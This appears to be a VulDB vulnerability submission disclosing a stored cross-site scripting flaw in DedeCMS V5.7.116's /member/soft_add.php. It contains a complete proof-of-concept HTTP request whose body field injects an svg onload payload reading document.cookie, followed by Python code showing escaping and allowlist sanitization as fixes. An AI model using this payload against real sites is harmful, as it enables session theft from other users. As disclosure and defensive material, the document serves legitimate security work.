Submission #453003: DedeCMS V5.7.116 Cross Site Scripting Information

Title: DedeCMS V5.7.116 Cross Site Scripting
Description:

Summary

A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. It exists because the body parameter of the /member/soft_add.php script is insufficiently filtered. An attacker can inject scripts into software information pages, potentially compromising the security of the website and its users.

Details

The /member/soft_add.php script does not adequately sanitize the body parameter. An attacker who can register as a member and publish software entries ("soft") can exploit this flaw by injecting scripts into the soft content; the scripts execute when other users view the compromised entry.

Proof of Concept (POC)

POST /member/soft_add.php HTTP/1.1
Host: target-ip
Content-Length: 2657
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dopost"

save
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="channelid"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="title"

test soft
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="writer"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="filetype"

.exe
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="language"

简体中文
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softtype"

国产软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="accredit"

共享软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="os"

Win2003,WinXP,Win2000,Win9X
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softrank"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialDemo"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialUrl"

http://
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softsize"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="unit"

MB
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="source"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="typeid"

18
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="needmoney"

0
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_addonfields"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_fieldshash"

[users'fieldshash]
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="body"

<p>asd</p><svg/onload=alert(document.cookie)>
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softurl1"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="servermsg1"

本地下载
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="picnum"

5
------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
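The root cause named above is that the rich-text body field reaches the page without adequate filtering. The following is an added example (not DedeCMS code) of the two defensive treatments a rich-text field like this one normally gets: strict escaping, which turns the field into plain text, and an allowlist sanitizer, which keeps a small set of harmless tags and drops everything else, including svg and every on* handler. The allowlist, the safe URL schemes, and the sample body (the one from the PoC) are assumptions chosen for illustration.

```python
"""Defensive handling of a user-supplied rich-text field before it is stored
or rendered.  Added example, not DedeCMS code; the allowlist below is an
illustrative assumption, not the project's configuration."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements and the attributes each may keep.  Anything not listed (svg, img,
# script, iframe, style, any on* handler, ...) is removed.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(),
    "strong": set(), "ul": set(), "ol": set(), "li": set(), "a": {"href"},
}
VOID_TAGS = {"br"}
SAFE_URL_SCHEMES = {"http", "https"}  # rejects javascript:, data:, vbscript:, ...

# Constructed sample: the body value from the PoC request above.
POC_BODY = "<p>asd</p><svg/onload=alert(document.cookie)>"


def escape_for_html(value: str) -> str:
    """Strict option (PHP htmlspecialchars equivalent): the browser renders the
    markup as literal text, so no element or handler is ever created."""
    return html.escape(value, quote=True)


class _AllowlistSanitizer(HTMLParser):
    """Rebuilds the input from the parsed tree, emitting only allowed
    elements/attributes and escaping all text nodes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag not in ALLOWED_TAGS:
            return  # element dropped; its text content still flows through handle_data
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name == "href":
                scheme = urlparse(value.strip()).scheme.lower()
                if scheme not in SAFE_URL_SCHEMES:
                    continue  # also drops relative links; relax if those are needed
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        tag = tag.lower()
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is always re-escaped, so a raw "<" can never reach the page.
        self.out.append(html.escape(data, quote=False))

    # Comments, doctype and processing instructions are silently discarded
    # by the base class defaults.


def sanitize_html(value: str) -> str:
    """Allowlist option: keeps basic formatting, removes everything else."""
    parser = _AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print("escaped  :", escape_for_html(POC_BODY))
    print("sanitized:", sanitize_html(POC_BODY))
```

Run against the PoC body, the sanitizer keeps `<p>asd</p>` and discards the svg element and its onload handler entirely; the escaping variant keeps the original characters but as inert text. Either treatment should be applied on output (when the stored value is rendered), with sanitization on input as an additional layer, since input-only filtering leaves every other renderer of the stored field exposed.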
Source: https://github.com/Hebing123/cve/issues/78
User: jiashenghe (UID 39445)
Submitted: 2024-11-27 10:34 (2 years ago)
Moderation: 2024-12-04 17:31 (7 days later)
Status: Accepted
VulDB entry: 286904 [DedeCMS 5.7.116 /member/soft_add.php body Cross Site Scripting]
Points: 20
